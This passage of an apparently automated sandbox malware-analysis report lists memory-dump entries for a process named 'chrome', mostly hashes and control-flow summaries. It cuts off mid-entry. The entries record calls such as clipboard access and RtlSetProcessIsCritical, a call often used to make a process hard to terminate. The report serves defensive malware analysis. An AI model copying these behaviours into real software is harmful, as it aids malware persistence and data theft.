                                                                              • API ID: Clipboard
                                                                              • String ID:
                                                                              • API String ID: 220874293-0
                                                                              • Opcode ID: 30864c0699e7aaeb22c9ee4a66e823715efe58f9de1f363c1d5c1828c39c6d74
                                                                              • Instruction ID: d96f0bb40808fc7c433c360515053ff4cd469270eec26d78835bbce49afce0a8
                                                                              • Opcode Fuzzy Hash: 30864c0699e7aaeb22c9ee4a66e823715efe58f9de1f363c1d5c1828c39c6d74
                                                                              • Instruction Fuzzy Hash: DB3110B0A01208DFDB24DF99C985BDEBBF1EB48314F248069E405BB790C774A949CFA5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 350 2b9e9d0-2b9f5a8 OleGetClipboard 353 2b9f5aa-2b9f5b0 350->353 354 2b9f5b1-2b9f5c2 350->354 353->354 356 2b9f5cc-2b9f5ff 354->356 359 2b9f60f 356->359 360 2b9f601-2b9f605 356->360 362 2b9f610 359->362 360->359 361 2b9f607-2b9f60a call 2b902dc 360->361 361->359 362->362
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000012.00000002.83503409738.0000000002B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_18_2_2b90000_chrome.jbxd
                                                                              Similarity
                                                                              • API ID: Clipboard
                                                                              • String ID:
                                                                              • API String ID: 220874293-0
                                                                              • Opcode ID: ff558bba1e9489527d9ff07b2ee3ab2bfe1d657e4f0767edd03c6eb861c7df08
                                                                              • Instruction ID: 746b5d59769b39094eb1833e59f01d283468c2dafe6e4be4f21bd79d05d8f2ea
                                                                              • Opcode Fuzzy Hash: ff558bba1e9489527d9ff07b2ee3ab2bfe1d657e4f0767edd03c6eb861c7df08
                                                                              • Instruction Fuzzy Hash: 0F3111B0A01208DFDB24DF99C984BDEBBF1EF48314F2480A9E404BB791D774A845CBA5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 364 2b9aad9-2b9ab1c 366 2b9ab24-2b9ab7f RtlSetProcessIsCritical 364->366 367 2b9ab81 366->367 368 2b9ab86-2b9abae 366->368 367->368
                                                                              APIs
                                                                              • RtlSetProcessIsCritical.NTDLL(?,?), ref: 02B9AB72
                                                                              Memory Dump Source
                                                                              • Source File: 00000012.00000002.83503409738.0000000002B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_18_2_2b90000_chrome.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalProcess
                                                                              • String ID:
                                                                              • API String ID: 2695349919-0
                                                                              • Opcode ID: d64998b9fc0491111fc937567cc036d274e2570ed217286ef8f673f88cb140ca
                                                                              • Instruction ID: 4f399226acad3daac0f6b2245096a42b7fa1548c2fda0f724092810e923a35da
                                                                              • Opcode Fuzzy Hash: d64998b9fc0491111fc937567cc036d274e2570ed217286ef8f673f88cb140ca
                                                                              • Instruction Fuzzy Hash: D1214AB69012599FDB14CF9AD484BEEFBF4AF49320F14806AE455A3650C378AA48CF61
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 370 2b9aae0-2b9ab7f RtlSetProcessIsCritical 372 2b9ab81 370->372 373 2b9ab86-2b9abae 370->373 372->373
                                                                              APIs
                                                                              • RtlSetProcessIsCritical.NTDLL(?,?), ref: 02B9AB72
                                                                              Memory Dump Source
                                                                              • Source File: 00000012.00000002.83503409738.0000000002B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_18_2_2b90000_chrome.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalProcess
                                                                              • String ID:
                                                                              • API String ID: 2695349919-0
                                                                              • Opcode ID: f3835a4befdf4707ca173c3aee32b4e144bb13aaa49681fe9da800b60a9b2fbd
                                                                              • Instruction ID: e41473e990ba602baad44e04491f28520e507cab4728186d98cd122f8e36cc89
                                                                              • Opcode Fuzzy Hash: f3835a4befdf4707ca173c3aee32b4e144bb13aaa49681fe9da800b60a9b2fbd
                                                                              • Instruction Fuzzy Hash: FC213DB59012598FCB14CF9AD484BEEFBF4AF59310F14816EE455A3750C378AA48CF61
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 375 2b9edc8-2b9ee64 DuplicateHandle 376 2b9ee6d-2b9ee8a 375->376 377 2b9ee66-2b9ee6c 375->377 377->376
                                                                              APIs
                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02B9EE57
                                                                              Memory Dump Source
                                                                              • Source File: 00000012.00000002.83503409738.0000000002B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_18_2_2b90000_chrome.jbxd
                                                                              Similarity
                                                                              • API ID: DuplicateHandle
                                                                              • String ID:
                                                                              • API String ID: 3793708945-0
                                                                              • Opcode ID: ceb93bc50da4896d2879eb4513d9b5949ef9ef6f1fe03bb557ee2d061c3d0013
                                                                              • Instruction ID: 708d1add4edf54c353258845406d89cb9a8829932c43e8e93c1ff35b5208aeb5
                                                                              • Opcode Fuzzy Hash: ceb93bc50da4896d2879eb4513d9b5949ef9ef6f1fe03bb557ee2d061c3d0013
                                                                              • Instruction Fuzzy Hash: 1E21E3B5D002089FDB10CFA9D984ADEBBF5FB48714F14845AE818B3750D378A954CFA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 380 2b9edd0-2b9ee64 DuplicateHandle 381 2b9ee6d-2b9ee8a 380->381 382 2b9ee66-2b9ee6c 380->382 382->381
                                                                              APIs
                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02B9EE57
                                                                              Memory Dump Source
                                                                              • Source File: 00000012.00000002.83503409738.0000000002B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_18_2_2b90000_chrome.jbxd
                                                                              Similarity
                                                                              • API ID: DuplicateHandle
                                                                              • String ID:
                                                                              • API String ID: 3793708945-0
                                                                              • Opcode ID: 651d2d58680da29ca539c99ef68a9c11cbe1ee65c82d74260ad169c25a71250d
                                                                              • Instruction ID: 5b70f1018876262201aed03247824da06cfa0fb32d2ee4fcce154c48c223b06c
                                                                              • Opcode Fuzzy Hash: 651d2d58680da29ca539c99ef68a9c11cbe1ee65c82d74260ad169c25a71250d
                                                                              • Instruction Fuzzy Hash: 2121E4B59002089FDF10CF9AD984ADEFBF8FB48714F14845AE914A3710C374A944CFA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 385 2b9e8b8-2b9f42a OleInitialize 387 2b9f42c-2b9f432 385->387 388 2b9f433-2b9f450 385->388 387->388
                                                                              APIs
                                                                              • OleInitialize.OLE32(00000000), ref: 02B9F41D
                                                                              Memory Dump Source
                                                                              • Source File: 00000012.00000002.83503409738.0000000002B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_18_2_2b90000_chrome.jbxd
                                                                              Similarity
                                                                              • API ID: Initialize
                                                                              • String ID:
                                                                              • API String ID: 2538663250-0
                                                                              • Opcode ID: 36e9b368c3ba019ba1d5c400d51205a4c09a14cc287a448ada3c2172bdcedb2e
                                                                              • Instruction ID: ab43ddb3c21ed2034f119e6b69d348854a71a80fce3aab184d466823fa46ccc6
                                                                              • Opcode Fuzzy Hash: 36e9b368c3ba019ba1d5c400d51205a4c09a14cc287a448ada3c2172bdcedb2e
                                                                              • Instruction Fuzzy Hash: DD1103B19002488FCB10DF9AD545BEEBBF8EB48324F148469D519A7B00C378A944CFA5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 391 2b9f3c0-2b9f42a OleInitialize 392 2b9f42c-2b9f432 391->392 393 2b9f433-2b9f450 391->393 392->393
                                                                              APIs
                                                                              • OleInitialize.OLE32(00000000), ref: 02B9F41D
                                                                              Memory Dump Source
                                                                              • Source File: 00000012.00000002.83503409738.0000000002B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_18_2_2b90000_chrome.jbxd
                                                                              Similarity
                                                                              • API ID: Initialize
                                                                              • String ID:
                                                                              • API String ID: 2538663250-0
                                                                              • Opcode ID: a801ca7428e618c6057b98cd5321134d3139488f5250ba4529305934297933b9
                                                                              • Instruction ID: 6e6d8ea69ff90967cf8b53b8bb8d16a53ad9fb5459f4630b9bf9b7891787f6f9
                                                                              • Opcode Fuzzy Hash: a801ca7428e618c6057b98cd5321134d3139488f5250ba4529305934297933b9
                                                                              • Instruction Fuzzy Hash: 171112B59002488FCB10DFAAD548BDEFBF4AB48324F14845AD518B3B10C378A548CFA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000012.00000002.83502636626.00000000029BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 029BD000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_18_2_29bd000_chrome.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 43a55132278f08e296525c45a3a4c0fdbce255cae1b0ea9f49ebe5a5e8e42726
                                                                              • Instruction ID: 5f4ee8f00f54fdcdeef79249686226be3de9199d20b2c50ab2847265bcefee27
                                                                              • Opcode Fuzzy Hash: 43a55132278f08e296525c45a3a4c0fdbce255cae1b0ea9f49ebe5a5e8e42726
                                                                              • Instruction Fuzzy Hash: BE212571604240EFDB06DF20DAC0B66BF65FF88728F248569E9094B24AC336D456CBB1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000012.00000002.83502786752.00000000029CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 029CD000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_18_2_29cd000_chrome.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 13d5f223b133f2a6cfd5bb30787c70048e8141549a527b9582f6b34d20052363
                                                                              • Instruction ID: 3d90e85a85b100b2e1885b05eba9edc8cd56d21ca99b3c2c7351633865c9bad9
                                                                              • Opcode Fuzzy Hash: 13d5f223b133f2a6cfd5bb30787c70048e8141549a527b9582f6b34d20052363
                                                                              • Instruction Fuzzy Hash: 4821B0B5644240AFEB08DF14D9C0B26BBA5EB88718F34C97DD8094B386C736D446CBB2
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000012.00000002.83502636626.00000000029BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 029BD000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_18_2_29bd000_chrome.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: c174b99a3280cc074a99e3120680e10ac2fad4227b3f3157a121cdbc95ff2124
                                                                              • Instruction ID: a4dba2a1df7a72d5751225f9a7cbd9c784b9aaf47fde41aff82a0b130580e1a9
                                                                              • Opcode Fuzzy Hash: c174b99a3280cc074a99e3120680e10ac2fad4227b3f3157a121cdbc95ff2124
                                                                              • Instruction Fuzzy Hash: 9411D376504280DFCB06CF10DAC4B56BF72FF88324F24C5A9D8094B256C336D456CBA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000012.00000002.83502786752.00000000029CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 029CD000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_18_2_29cd000_chrome.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ba05434d0b3cf8fa473853150aad7b91225d7ee550c118744d545a2eea43922d
                                                                              • Instruction ID: 0d6f487f235e8b7cec22d84afdfed7b6357e61d60b1010e6d16e47e2a942e896
                                                                              • Opcode Fuzzy Hash: ba05434d0b3cf8fa473853150aad7b91225d7ee550c118744d545a2eea43922d
                                                                              • Instruction Fuzzy Hash: C9118B75504280DFDB05CF10D9C4B15BBB2FB88314F24C6ADD8094B796C33AD45ACBA2
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000013.00000002.80407135783.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_19_2_13c0000_chrome.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: \Vm
                                                                              • API String ID: 0-1605072407
                                                                              • Opcode ID: 326f36e5b8b43e99a86532aaa978d9a6098ed58c82f16017c5a7e651ef6a674d
                                                                              • Instruction ID: 4b930e589522b495fa64ec695f723fa6cb4491cd1531a11e010d3060e8ebef37
                                                                              • Opcode Fuzzy Hash: 326f36e5b8b43e99a86532aaa978d9a6098ed58c82f16017c5a7e651ef6a674d
                                                                              • Instruction Fuzzy Hash: 27915B70E00209DFDB14CFA9C8957DDBBF2AF88B18F24812DE804A7294EB749C45CB91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000013.00000002.80407135783.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_19_2_13c0000_chrome.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 4231c434d2eebce18620f53a164ddb1cb8857bb32e41ed08e986d37b6476eab7
                                                                              • Instruction ID: 97d1df815848a2f308510bc5a9de45c696d812a94c807b2350383b3c86d24d9c
                                                                              • Opcode Fuzzy Hash: 4231c434d2eebce18620f53a164ddb1cb8857bb32e41ed08e986d37b6476eab7
                                                                              • Instruction Fuzzy Hash: 8DB12B70E00209CFDB14CFA9D89979DBBF2AF88B18F14852DE415E7294EB749845CB81
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000013.00000002.80407135783.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_19_2_13c0000_chrome.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: \Vm$\Vm
                                                                              • API String ID: 0-2741823658
                                                                              • Opcode ID: 5f42b4e8f14a15fb7061b30a423f886492c60d9a401b0f5a9f41d44cf0787912
                                                                              • Instruction ID: 584c42ad7b796234e60cb8ad86d3af0290cbfdbbb47614355334ea4e7edf3011
                                                                              • Opcode Fuzzy Hash: 5f42b4e8f14a15fb7061b30a423f886492c60d9a401b0f5a9f41d44cf0787912
                                                                              • Instruction Fuzzy Hash: D2712770E002099FDF14DFA9C8947DEBBF2AF88B18F14C12DE415A7294EB749845CB91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000013.00000002.80407135783.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_19_2_13c0000_chrome.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: \Vm$\Vm
                                                                              • API String ID: 0-2741823658
                                                                              • Opcode ID: e30f8d4db351237175e821efa1c9d5ed00999c0acfd6b29ed9032345618e15d6
                                                                              • Instruction ID: d054543bc6f0feefea0bfc247b8dacefeea2e0c84226811d918ea6a1ee9ff782
                                                                              • Opcode Fuzzy Hash: e30f8d4db351237175e821efa1c9d5ed00999c0acfd6b29ed9032345618e15d6
                                                                              • Instruction Fuzzy Hash: 0E715870E00209DFDF14DFA9C8947DEBBF2AF88B18F14812DE815A7254EB749845CB91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000013.00000002.80407135783.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_19_2_13c0000_chrome.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: \Vm
                                                                              • API String ID: 0-1605072407
                                                                              • Opcode ID: bc6b732b369d6bde81bcc9adcc875b939a96718e0ad21dbb3c5a4ccfcdb5979b
                                                                              • Instruction ID: 702a7f113ffdb169602e100725a474bf782cfd84232568667a42f893085a79b5
                                                                              • Opcode Fuzzy Hash: bc6b732b369d6bde81bcc9adcc875b939a96718e0ad21dbb3c5a4ccfcdb5979b
                                                                              • Instruction Fuzzy Hash: A3A14970E00209DFDB14CFA9D9957EDFBF2AF88B18F24812DE804A7294DB749845CB91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000013.00000002.80407135783.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_19_2_13c0000_chrome.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 3e07db57764eb3b651dd4d5417d1910e5fff1426478dccc192a123f45a5955ba
                                                                              • Instruction ID: e8f5aafd74f7bbd0f99db3fba86e4088ecd795237034489cb4f52cb5e85c4715
                                                                              • Opcode Fuzzy Hash: 3e07db57764eb3b651dd4d5417d1910e5fff1426478dccc192a123f45a5955ba
                                                                              • Instruction Fuzzy Hash: E9A11A70E0021ACFDB10CFA9D89979DBBF2BF88B18F14852DE414E7294EB749845CB91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000013.00000002.80407135783.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_19_2_13c0000_chrome.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 6692e73f21fc21496663b278d7649366f5891c47af50211cc84dfbe4bb48847b
                                                                              • Instruction ID: 9c79626ef33f25780d62a36703d95c275820fdb394001a4d133d034ee9663f38
                                                                              • Opcode Fuzzy Hash: 6692e73f21fc21496663b278d7649366f5891c47af50211cc84dfbe4bb48847b
                                                                              • Instruction Fuzzy Hash: E5616D74E00248DFDB18EBB8D454AAEBBB6BF99309F00442DE401AB691DF359C06DF51
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000013.00000002.80407135783.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_19_2_13c0000_chrome.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ae2ade5d3b066a2bc613ae589e06791a47dccd7c90a989e7e1f893adf0b2c87f
                                                                              • Instruction ID: 384238b6588c86902a02d4ac1326b3fbeadafd8ac534398bf9432e1e77a1452f
                                                                              • Opcode Fuzzy Hash: ae2ade5d3b066a2bc613ae589e06791a47dccd7c90a989e7e1f893adf0b2c87f
                                                                              • Instruction Fuzzy Hash: 84616D74E00248DFDB18EBB8D464AAEBBB6BF99309F004429D402AB655DF359C05DF51
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000013.00000002.80407135783.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_19_2_13c0000_chrome.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ae4a2ee56afa33a6a178ad21dc7fb0fbcf35a943557048a160d4ccf8adb33241
                                                                              • Instruction ID: b6821d61f573fecd9e7f08bfaa1bd8410c3ea4cf78a8ab90d69a21b750dbd2eb
                                                                              • Opcode Fuzzy Hash: ae4a2ee56afa33a6a178ad21dc7fb0fbcf35a943557048a160d4ccf8adb33241
                                                                              • Instruction Fuzzy Hash: 18412370A00256CFCB1C9F7CC4442AEBBB6AF89608F15847EE459EB351DB358C85CB90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000013.00000002.80407135783.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_19_2_13c0000_chrome.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b3e4959865aded495ad20f7b65b4bc74bd8fbeecf6595774fba8f73c26f3e4ea
                                                                              • Instruction ID: f64899e653634e7709fd55f3e83d24224f822ad9f2c628d76ef20a33c775a8ce
                                                                              • Opcode Fuzzy Hash: b3e4959865aded495ad20f7b65b4bc74bd8fbeecf6595774fba8f73c26f3e4ea
                                                                              • Instruction Fuzzy Hash: C631B230B001098FCB54EB7DD45869EBBF6AF88659B15853DD809EB352EF34EC018B95
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000013.00000002.80407135783.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_19_2_13c0000_chrome.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d216ed5b76c522f69deb7a9b43ee6529b670bfabf6551a2bc4246d312bd08b78
                                                                              • Instruction ID: 3e55a882adae6a87c5fdff90c93bf9907a3807f611a66c02942a7352a1d17af1
                                                                              • Opcode Fuzzy Hash: d216ed5b76c522f69deb7a9b43ee6529b670bfabf6551a2bc4246d312bd08b78
                                                                              • Instruction Fuzzy Hash: F24112B4D00349DFDB14DFA9C484ADEBBB5BF48318F148429E819AB350DB74A949CF90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000013.00000002.80407135783.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_19_2_13c0000_chrome.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 68b0e1d7a4b48a17704269910c9475c864d4af77184411f0f0d5096cf660838e
                                                                              • Instruction ID: 246b1503aa222e862dfd6a562ecaf5821220b7a398c12c068c5903eef39a7e4f
                                                                              • Opcode Fuzzy Hash: 68b0e1d7a4b48a17704269910c9475c864d4af77184411f0f0d5096cf660838e
                                                                              • Instruction Fuzzy Hash: 3831BF30F001198FCB54DB7C949469EBBF6AF89658B15857DD81AEB352EF30EC018B94
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000013.00000002.80407135783.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_19_2_13c0000_chrome.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 6f0f5fda1caf9f49866c6742d988c3a0fa5e5b56b374fa0d9eb7742ea89a0d09
                                                                              • Instruction ID: aa5a4e9e7f1248ff8b6c6ce40a54d39a8329fb10c433a5835343633a41d4745a
                                                                              • Opcode Fuzzy Hash: 6f0f5fda1caf9f49866c6742d988c3a0fa5e5b56b374fa0d9eb7742ea89a0d09
                                                                              • Instruction Fuzzy Hash: 6A4112B4D0034DDFDB14CF99C884ADEBBB5BF48718F148429E809AB250DB74A949CF90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000013.00000002.80407135783.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_19_2_13c0000_chrome.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: c2648fc6709dfa8adb7707d0f8fb5c92509639c7148891badeebebce9a830964
                                                                              • Instruction ID: ddec8e18da70c35871e3a4e9c8bf6d24697c57c3c8d21bfb8ba871bbc14bc60a
                                                                              • Opcode Fuzzy Hash: c2648fc6709dfa8adb7707d0f8fb5c92509639c7148891badeebebce9a830964
                                                                              • Instruction Fuzzy Hash: B321F838B04288CBDB1CDFA5C4547DE7BFAAB8871CF188079E542A7684DA76CD818750
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000013.00000002.80407135783.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_19_2_13c0000_chrome.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a3dc5dc3e73244041802fa15b64bf763ae8e8c5bc9b20c0bfd9ae48b6d9af280
                                                                              • Instruction ID: 0ca7f2befc930e5cc594a45da955caf99af70d691089396689e2c0dd2955cf90
                                                                              • Opcode Fuzzy Hash: a3dc5dc3e73244041802fa15b64bf763ae8e8c5bc9b20c0bfd9ae48b6d9af280
                                                                              • Instruction Fuzzy Hash: 15318E34B00508DFDB18EBB8E8546EEBBB6EF88718F144429E545AB684CF365D44CFA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000013.00000002.80407135783.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_19_2_13c0000_chrome.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: f127f40f38bcdeab60d1af9e9bcfa8620137b73e72fcfa3f4877d303fc15a927
                                                                              • Instruction ID: f72b1619170331e0341e90c7eec9b57e838e9d1905e6aff60441ade39ccef225
                                                                              • Opcode Fuzzy Hash: f127f40f38bcdeab60d1af9e9bcfa8620137b73e72fcfa3f4877d303fc15a927
                                                                              • Instruction Fuzzy Hash: A6219130A04258CFDB199B78C4146AE7BB6BF8A708F1404AED101EB3A1DF754C45CBA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000013.00000002.80407135783.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_19_2_13c0000_chrome.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 27e42e74f16587d719103774e74701016409171dd623ecdc55928f01b842e0d0
                                                                              • Instruction ID: 2d9cf24a52a208782f92528fd5b394d19e581698a6e9601e01d16771c94a33e6
                                                                              • Opcode Fuzzy Hash: 27e42e74f16587d719103774e74701016409171dd623ecdc55928f01b842e0d0
                                                                              • Instruction Fuzzy Hash: D6212F30B04218CFDB29AB78C4146AE77F6AF89B19F14046ED506EB394DF769C41CBA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000013.00000002.80407135783.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_19_2_13c0000_chrome.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 8d40a3b1089be040d8e9ef4c079c0916c4e6d06ab011389ac19a4314d66d52cd
